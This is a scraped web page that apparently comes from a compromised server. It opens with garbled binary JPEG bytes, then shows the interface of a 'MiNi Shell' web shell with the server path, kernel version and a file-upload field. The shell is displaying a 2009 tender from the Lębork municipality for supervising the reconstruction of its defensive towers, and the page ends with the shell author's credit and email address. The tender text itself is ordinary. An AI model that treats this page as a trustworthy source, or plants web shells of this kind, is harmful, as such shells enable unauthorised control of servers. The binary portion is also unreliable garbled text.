JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090804/264752-N-2009.html

<p class="kh_header"><b>Lębork: Nadzór inwestorski nad realizacją rekonstrukcji Baszty Obronnej nr 24 przy ul. Derdowskiego i rekonstrukcji zabudowy Baszty nr 27 przy ul. Basztowej  w Lęborku.</b><br>
<b>Numer ogłoszenia: 264752 - 2009; data zamieszczenia: 04.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lębork , ul. Armii Krajowej 14, 84-300 Lębork, woj. pomorskie, tel. 0-59 862 42 80, faks 0-59 862 24 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lebork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad realizacją rekonstrukcji Baszty Obronnej nr 24 przy ul. Derdowskiego i rekonstrukcji zabudowy Baszty nr 27 przy ul. Basztowej  w Lęborku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nadzór inwestorski prowadzony będzie przy realizacji inwestycji związanej z rekonstrukcją baszt obronnych nr 24 i 27 w Lęborku. Baszty wyposażone będą w instalacje: wodno - kanalizacyjną i elektroenergetyczną. 
Zakres prac prowadzonych na placu budowy określony jest w dokumentacji projektowej opracowanej przez Biuro Projektowe i Obsługi Budownictwa PORTAL:
 a) Projekt budowlany rekonstrukcji Baszty Obronnej Nr 24 w Lęborku. - Załączniki Nr 11 do SIWZ
b) Projekt wykonawczy rekonstrukcji Baszty Obronnej Nr 24 w Lęborku. -  Załączniki Nr 12 do SIWZ
c) Projekt budowlany rekonstrukcji Baszty Nr 27 w Lęborku. Załączniki Nr 13 do SIWZ
d) Projekt wykonawczy rekonstrukcji zabudowy Baszty Nr 27 w Lęborku. Załączniki Nr 14 do SIWZ
e) Specyfikacja techniczna wykonania i odbioru robót budowlanych rekonstrukcji i odbudowy baszty nr 24 i baszty nr 27 w Lęborku - Załączniki Nr 15 do SIWZ. 
f) Przedmiar robót - baszty nr 24 - Załączniki Nr 16 do SIWZ.
g) Przedmiar robót - baszty nr 27 - Załączniki Nr 17 do SIWZ.
Przedmiotowe zamierzenie znajduje się w strefie bezwzględnej ochrony archeologiczno-konserwatorskiej i jest objęte odrębnym nadzorem archeologiczno-konserwatorskim, prace muszą być wykonywane zgodnie z Decyzjami Pomorskiego Wojewódzkiego Konserwatora Zabytków ZN-I-4151/3/2687/2008 i ZN-I-4151/1/127/2009 stanowiącymi Załącznik Nr 18 do SIWZ
Szczegółowy zakres obowiązków Wykonawcy jako inspektora nadzoru inwestorskiego obejmuje:
Reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności realizowanej inwestycji budowlanej z umową, dokumentacją projektową i pozwoleniem na budowę, zasadami wiedzy technicznej oraz przepisami techniczno - budowlanymi. Przeciwdziałanie nieprawidłowościom na placu budowy w związku z realizacją inwestycji oraz podejmowanie niezbędnych w tym zakresie czynności.
Sprawdzenie jakości wykonywanych robót, wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie. Sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowego obiektu i przekazanie go do użytkowania. Potwierdzenie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy poprzez potwierdzenie wykonanego przez realizatora robót budowlano - montażowych zakresu rzeczowego i finansowego zadania, w szczególności w zakresie zgodności przyjętych założeń w harmonogramie rzeczowo - finansowym, w protokołach odbioru robót, stanowiących podstawę do wystawiania faktur przez realizatora robót. Sprawdzenie harmonogramu rzeczowo - finansowego dostarczonego przez realizatora robót w zakresie zgodności przyjętych założeń z dokumentacją projektową i kosztorysem inwestorskim, w terminie nie dłuższym niż 7 dni od dostarczenia przez Zamawiającego, oraz czuwanie nad obiektem w kresie rękojmi i gwarancji. Obecność inspektora według potrzeb określonych przez inwestora na budowie i naradach, nie rzadziej niż raz w tygodniu
Ponadto inspektor nadzoru inwestorskiego przyjmuje do wykonania następujące czynności:
Udział w naradach roboczych na etapie realizacji inwestycji mających na celu m.in. rozstrzyganie technicznych spraw budowy, omawianie przebiegu realizacji budowy.
Udział w procesie przygotowania, kompletowania wniosku o uzyskanie pozwolenia na użytkowanie zrealizowanych obiektów.
Udział w pracach komisji powołanych do przeglądów gwarancyjnych dla zrealizowanej inwestycji objętej pełnionym nadzorem inwestorskim o ile zajdzie taka potrzeba w pracach komisji powołanych do ustalenia przyczyn stwierdzonych wad i usterek w zrealizowanym i przekazanym do użytkowania obiektach oraz kontrolowania ich usunięcia w okresie trwania gwarancji.
W przypadku konieczności wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacjach projektowych, Wykonawca zobowiązany jest do uzgodnienia rozwiązań wraz z naniesieniem niezbędnych poprawek w terminach ustalonych każdorazowo dla poszczególnych rozwiązań (terminy te ujęte będą w protokołach ze spotkań roboczych dotyczących realizacji robót).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium wnosi się przed upływem terminu składania ofert. W razie wpłat na konto wadium powinno być wnoszone z takim wyprzedzeniem, aby środki pieniężne znalazły się na rachunku bankowym Zamawiającego najpóźniej w dniu 13.08.2009 do godziny 10:15, pod rygorem uznania, że warunek wpłaty wadium nie został spełniony. Wykonawca zobowiązany jest wnieść wadium w wysokości 800,00 złotych słownie: osiemset złotych. Wadium może być wniesione w jednej lub kilku z następujących form: pieniądzu - przelewem na konto Urzędu Miejskiego w Lęborku przy ul. Armii Krajowej 14 (Bank Millennium nr konta 95 1160 2202 0000 0001 2713 3211), poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158, z późn. zm.).
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
Wadium wniesione w formie gwarancji bankowej, gwarancji ubezpieczeniowej wnosi się w oryginale dołączając do przygotowanej oferty w osobnej kopercie. Załącznikiem do oferty dot. dowodu wniesienia wadium będzie kserokopia gwarancji.
Zamawiający zwróci niezwłocznie wadium, jeżeli:
upłynął termin związania ofertą; zawarto umowę w sprawie zamówienia publicznego.
Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
który wycofał ofertę przed upływem terminu składania ofert; który został wykluczony z postępowania; którego oferta została odrzucona.
Zamawiający zażąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie pkt. 6 ppkt. 6.2. i 6.3., jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wniosą wadium w terminie określonym przez Zamawiającego.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie o uzupełnienie dokumentów, nie złożył dokumentów lub oświadczeń lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Spełnienie warunków art. 22 ust. 1 Prawa zamówień publicznych (Dz. U. Nr 223 z dnia 29.11.2007 r. poz. 1655 z późn. zm.)
Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
Inspektorzy wyznaczeni do realizacji zamówienia muszą posiadać uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie bez ograniczeń w zakresie branż:
konstrukcyjno - budowlanej
instalacyjnej w zakresie sieci, instalacji urządzeń wodociągowych i kanalizacyjnych
instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych
- potwierdzeniem jest złożenie oświadczeń i dokumentów wymienionych w rozdz. VI pkt. 1.1. - 1.7.
Wykonawca zrealizował w ciągu ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, co najmniej 1 nadzór inwestorski nad budową budynku, o wartości nie mniejszej niż 1.000.000,00 zł brutto - potwierdzeniem jest złożenie dokumentu opisanego w rozdz. VI pkt. 1.6.
Koordynatorem czynności inspektorów nadzoru inwestorskiego będzie inspektor nadzoru w specjalności konstrukcyjno - budowlanej, który zrealizował w ciągu ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, co najmniej 1 nadzór inwestorski nad budową budynku, o wartości nie mniejszej niż 1.000.000,00 zł brutto - potwierdzeniem jest złożenie dokumentu opisanego w rozdz. VI pkt. 1.6.
Posiadanie aktualnych ubezpieczeń od odpowiedzialności cywilnej osób, które będą uczestniczyć w wykonywaniu zamówienia - potwierdzeniem jest złożenie dokumentu opisanego w rozdz. VI pkt. 1.7.
Wniesienie wymaganego wadium.
Przyjęcie terminu ważności oferty przez okres 30 dni - potwierdzeniem jest złożenie oświadczenia opisanego w rozdz. VI pkt. 1.9.
Przyjęcie projektu umowy stanowiącego Załącznik Nr 7 do SIWZ - potwierdzeniem jest złożenie oświadczenia opisanego w rozdz. VI pkt. 1.10.
Wskazanie przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom - potwierdzeniem jest złożenie dokumentu opisanego w rozdz. VI pkt. 1.11..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu wymienione w art. 22 ust. 1 pkt. 1, 3, 4 ustawy Prawo zamówień publicznych (tekst jednolity Dz. U. Nr 223          z dnia 29.11.2007 poz. 1655 z późn. zm.) - wypełniony Załącznik Nr 2 do SIWZ.
Oświadczenie, że Wykonawca spełnia warunek udziału w postępowaniu zgodnie z art. 22 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych (tekst jednolity Dz. U. Nr 223 z dnia 29.11.2007 poz. 1655 z późn. zm.) - wypełniony Załącznik Nr 3 do SIWZ.
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Wykaz wykonanych usług w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, inwestora, przedmiotu, dat i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie. - wypełniony Załącznik Nr 8 do SIWZ.
Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia; uprawnienia, aktualne zaświadczenia o przynależności do właściwej izby samorządu zawodowego z aktualnym ubezpieczeniem, a także zakresu wykonywanych przez nich czynności - wypełniony Załącznik Nr 9 do SIWZ.
Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Dowód wniesienia wadium.
Oświadczenie o ważności oferty przez okres 30 dni - wypełniony Załącznik Nr 4 do SIWZ.
Oświadczenie o przyjęciu projektu umowy, stanowiącego Załącznik Nr 7 do SIWZ - wypełniony Załącznik Nr5 do SIWZ
Oświadczenie dotyczące powierzenia podwykonawcom wykonania części zamówienia - wypełniony Załącznik Nr 6 do SIWZ (wypełnić część A lub B)
Ewentualne pełnomocnictwo do podejmowania zobowiązań w imieniu Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.lebork.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIEJSKI ul. Armii Krajowej 14 Wydział Gospodarki Miejskiej i Inwestycji Urzędu Miejskiego w Lęborku - pok. 126.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2009 godzina 10:15, miejsce: URZĄD MIEJSKI ul. Armii Krajowej 14 w Kancelarii Ogólnej - BOX nr 1..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com